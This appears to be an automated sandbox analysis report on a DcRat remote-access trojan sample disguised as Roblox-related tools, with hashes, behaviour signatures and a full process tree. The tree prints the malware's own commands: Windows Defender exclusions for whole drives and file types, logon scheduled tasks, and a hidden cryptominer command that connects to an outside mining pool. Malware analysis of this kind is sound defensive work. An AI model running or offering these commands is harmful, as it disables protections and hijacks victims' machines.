Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    21-07-2024 20:24

General

  • Target

    2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe

  • Size

    9.5MB

  • MD5

    4050f2027e946d524e3a1078a6cd5419

  • SHA1

    698f02a2826e7d6ecfebf37b04f0231c904133eb

  • SHA256

    2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab

  • SHA512

    fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab

  • SSDEEP

    196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ

Malware Config

Signatures

  • DcRat 64 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies WinLogon for persistence 2 TTPs 18 IoCs
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • .NET Reactor proctector 3 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 40 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 35 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe
    "C:\Users\Admin\AppData\Local\Temp\2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab.exe"
    1⤵
    • DcRat
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
      "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2548
      • C:\Users\Admin\AppData\Local\Temp\Result.exe
        "C:\Users\Admin\AppData\Local\Temp\Result.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
          "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1192
          • C:\Windows\SysWOW64\msiexec.exe
            "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
            5⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            PID:1524
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1192 -s 1656
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2080
        • C:\Users\Admin\AppData\Local\Temp\solara.exe
          "C:\Users\Admin\AppData\Local\Temp\solara.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
            5⤵
              PID:2932
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
                6⤵
                • Loads dropped DLL
                PID:784
                • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                  "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                  7⤵
                  • Modifies WinLogon for persistence
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Program Files directory
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2980
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1788
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:912
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\CRMLog\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3032
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\AppPatch\ja-JP\smss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1772
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1292
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1484
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\services.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2468
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\Refcrt.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1952
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1276
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\csrss.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:584
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\sppsvc.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2404
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2360
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\Windows\explorer.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:564
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:940
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1576
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2432
                  • C:\Windows\twain_32\sppsvc.exe
                    "C:\Windows\twain_32\sppsvc.exe"
                    8⤵
                    • Executes dropped EXE
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:848
        • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
          "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2908
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
            4⤵
              PID:1920
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
                5⤵
                • Loads dropped DLL
                PID:2112
                • C:\winNet\ComContainerbrowserRefRuntime.exe
                  "C:\winNet/ComContainerbrowserRefRuntime.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  PID:2976
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0lbrM5rdln.bat"
                    7⤵
                      PID:2876
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:2840
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          8⤵
                            PID:1744
                          • C:\winNet\WerFault.exe
                            "C:\winNet\WerFault.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:2096
                • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:2752
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1228
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2376
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2756
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2100
                    • C:\Windows\System32\cmd.exe
                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2448
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                        6⤵
                        • DcRat
                        • Scheduled Task/Job: Scheduled Task
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2712
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                      5⤵
                      • Loads dropped DLL
                      PID:2712
                      • C:\Users\Admin\Bloxstrap.exe
                        C:\Users\Admin\Bloxstrap.exe
                        6⤵
                        • Executes dropped EXE
                        PID:1744
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                          7⤵
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          PID:2620
                          • C:\Windows\System32\cmd.exe
                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                            8⤵
                              PID:1952
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                PID:2348
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                9⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                PID:2040
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:236
                              • C:\Windows\System32\conhost.exe
                                "C:\Windows\System32\conhost.exe" "/sihost64"
                                9⤵
                                  PID:2040
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                8⤵
                                  PID:2228
                      • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                        "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1212
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                          4⤵
                            PID:2972
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                              5⤵
                              • Loads dropped DLL
                              PID:2136
                              • C:\DriversavessessionDlldhcp\Roblox.exe
                                "C:\DriversavessessionDlldhcp/Roblox.exe"
                                6⤵
                                • Modifies WinLogon for persistence
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:1856
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltcsaawt\ltcsaawt.cmdline"
                                  7⤵
                                    PID:1644
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDF.tmp" "c:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\CSC37168581A8D94A6C84CFBC64B17B38F4.TMP"
                                      8⤵
                                        PID:2936
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a2winfxb\a2winfxb.cmdline"
                                      7⤵
                                        PID:2816
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF4C.tmp" "c:\Users\Admin\Music\CSC6D5C1AFCD1984D5EBFD1EC6CEC5D8814.TMP"
                                          8⤵
                                            PID:2904
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zo10lvbw\zo10lvbw.cmdline"
                                          7⤵
                                          • Drops file in Windows directory
                                          PID:1020
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1056.tmp" "c:\Windows\AppPatch\ja-JP\CSCC375D023683141EC9126F98C4EDA9BAD.TMP"
                                            8⤵
                                              PID:1908
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3q4jp1de\3q4jp1de.cmdline"
                                            7⤵
                                              PID:956
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10B3.tmp" "c:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\CSCA59D324A68AE4B22A6E15266FD9E16AA.TMP"
                                                8⤵
                                                  PID:2108
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q01gslrh\q01gslrh.cmdline"
                                                7⤵
                                                • Drops file in Program Files directory
                                                PID:2248
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1130.tmp" "c:\Program Files (x86)\Common Files\DESIGNER\CSCF7CCF5184CCC4DE8B28EE88B3840D7E9.TMP"
                                                  8⤵
                                                    PID:912
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hcjwnium\hcjwnium.cmdline"
                                                  7⤵
                                                    PID:2880
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11CC.tmp" "c:\DriversavessessionDlldhcp\CSC559EE64D83AC4A8280A5A24C5B60E145.TMP"
                                                      8⤵
                                                        PID:1616
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\flnbjk2l\flnbjk2l.cmdline"
                                                      7⤵
                                                        PID:2972
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1297.tmp" "c:\MSOCache\All Users\CSCF356FD83CFB9430EA0EF1F52A39F846.TMP"
                                                          8⤵
                                                            PID:1944
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4veo0d4h\4veo0d4h.cmdline"
                                                          7⤵
                                                          • Drops file in Windows directory
                                                          PID:1868
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1304.tmp" "c:\Windows\twain_32\CSC9A457BE89CBC4F64AC68B4421A86AF34.TMP"
                                                            8⤵
                                                              PID:2720
                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5rfmmif\l5rfmmif.cmdline"
                                                            7⤵
                                                            • Drops file in Program Files directory
                                                            PID:1784
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1381.tmp" "c:\Program Files (x86)\Windows Portable Devices\CSC8EB735E73C8240119DE82E7875807925.TMP"
                                                              8⤵
                                                                PID:2936
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kqleqlab\kqleqlab.cmdline"
                                                              7⤵
                                                                PID:1440
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13CF.tmp" "c:\Users\All Users\Microsoft\Windows\CSC13970AFFC3FB4AE3A9F39E5D723D41AB.TMP"
                                                                  8⤵
                                                                    PID:2904
                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aryds0rx\aryds0rx.cmdline"
                                                                  7⤵
                                                                    PID:2104
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES141D.tmp" "c:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\CSC1DB539DCA86D44AD86BABAAFDEA71AB9.TMP"
                                                                      8⤵
                                                                        PID:2360
                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j10hzyo0\j10hzyo0.cmdline"
                                                                      7⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:1232
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES147A.tmp" "c:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\CSC47ECE852170F480E91EA1B84FE8DFF.TMP"
                                                                        8⤵
                                                                          PID:1996
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xq3esore\xq3esore.cmdline"
                                                                        7⤵
                                                                          PID:1532
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E8.tmp" "c:\Users\Admin\Music\CSC9B0B8199D9CF45F6B333935465BB2D70.TMP"
                                                                            8⤵
                                                                              PID:2732
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4yeijp43\4yeijp43.cmdline"
                                                                            7⤵
                                                                            • Drops file in System32 directory
                                                                            PID:956
                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1545.tmp" "c:\Windows\System32\CSC651989FCF30C4F4A86B7699D8127553D.TMP"
                                                                              8⤵
                                                                                PID:2684
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1724
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                              7⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              PID:1044
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
